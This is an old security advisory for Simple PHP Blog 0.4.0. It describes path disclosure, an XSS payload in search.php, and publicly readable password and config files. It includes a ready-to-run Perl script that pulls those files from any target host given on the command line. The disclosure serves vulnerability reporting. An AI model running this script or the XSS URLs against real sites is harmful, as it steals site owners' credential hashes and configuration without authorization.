____________________ ___ ___ ________ \_ _____/\_ ___ \ / | \\_____ \ | __)_ / \ \// ~ \/ | \ | \\ \___\ Y / | \ /_______ / \______ /\___|_ /\_______ / \/ \/ \/ \/ .OR.ID ECHO_ADV_12$2005 --------------------------------------------------------------------------- Vulnerabilities in sphpblog --------------------------------------------------------------------------- Author: y3dips Date: April, 13th 2005 Location: Indonesia, Jakarta Web: http://echo.or.id/adv/adv12-y3dips-2005.txt --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Simple PHP blog (sphpblog) version: 0.4.0 lisensi: GPL - http://www.gnu.org/licenses/licenses.html#GPL url : http://sourceforge.net/projects/sphpblog/ Author: Alexander Palmo (apalmo bigevilbrain com) Description: simple Blog without databases needed --------------------------------------------------------------------------- Vulnerabilities: ~~~~~~~~~~~~~~~~ A. Full Path disclosures http://[Url]/sphpblog/scripts/sb_functions.php Ex : Warning: main(scripts/sb_fileio.php): failed to open stream: No such file or directory in /var/www/sphpblog/scripts/sb_functions.php on line 52 Fatal error: main(): Failed opening required 'scripts/sb_fileio.php' (include_path='.:/usr/share/pear') in /var/www/sphpblog/scripts/sb_functions.php on line 52 B. XSS in search.php http://Url/sphpblog/search.php?q=[XSS] http://[Url]/sphpblog/search.php?q=%3Cmarquee%3Ewe+are+a+like%3C%2Fmarquee%3E http://[URl]/sphpblog/search.php?q=echo C. Critical Information dislosures Critical file (password and config file) are vulnerable to direct access to view 'critical' information about the blog and the user. Password file are using PHP`s crypt() function http://[Url]/sphpblog/config/password.txt http://[Url]/sphpblog/config/config.txt --------------------------------------------------------------------------- Script: ~~~~~~~ #!/usr/bin/perl -w # Remote grabbing sphpblog password & config file by y3dips # Bug find by y3dips # Bug published at http://echo.or.id/adv/adv12-y3dips-2005.txt print "\n* Remote grabbing sphpblog password & config file by y3dips *\n"; require LWP::UserAgent; if(@ARGV == 1) { $target= $ARGV[0]; my $ua = LWP::UserAgent->new; $ua->agent("MSIE/6.0 Windows"); $ua->timeout(10); $ua->env_proxy; my @url = ("http://$target/config/password.txt", " http://$target/config/config.txt"); foreach my $urlz (@url) { my $injek = $ua->get($urlz); print "\n-------------------------------\n"; if ($injek->is_success) { print $injek->content;} else {die $injek->status_line;} print "\n-------------------------------\n"; } } else { print "Use: perl $0 [www.target.com] \n"; } # EOF y3dips(c)2005 # greetz : # @echo|staff = qw/ m0by the_day z3r0byt3 comex k-159 c-a-s-e s`to lirva32 anonymous /; # @waraxe.us = qw/ waraxe LINUX shai-tan all_guys /; # @echo = qw/ newbie_hacker@yahoogroups.com #e-c-h-o_@_DALnet /; --------------------------------------------------------------------------- Shoutz: ~~~~~~~ ~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous ~ waraxe and all frineds at waraxe.us ~ newbie_hacker@yahoogroups.com , ~ #e-c-h-o@DALNET --------------------------------------------------------------------------- Contact: ~~~~~~~~ y3dips || echo|staff || y3dips[at]gmail[dot]com Homepage: http://y3dips.echo.or.id/ -------------------------------- [ EOF ] ----------------------------------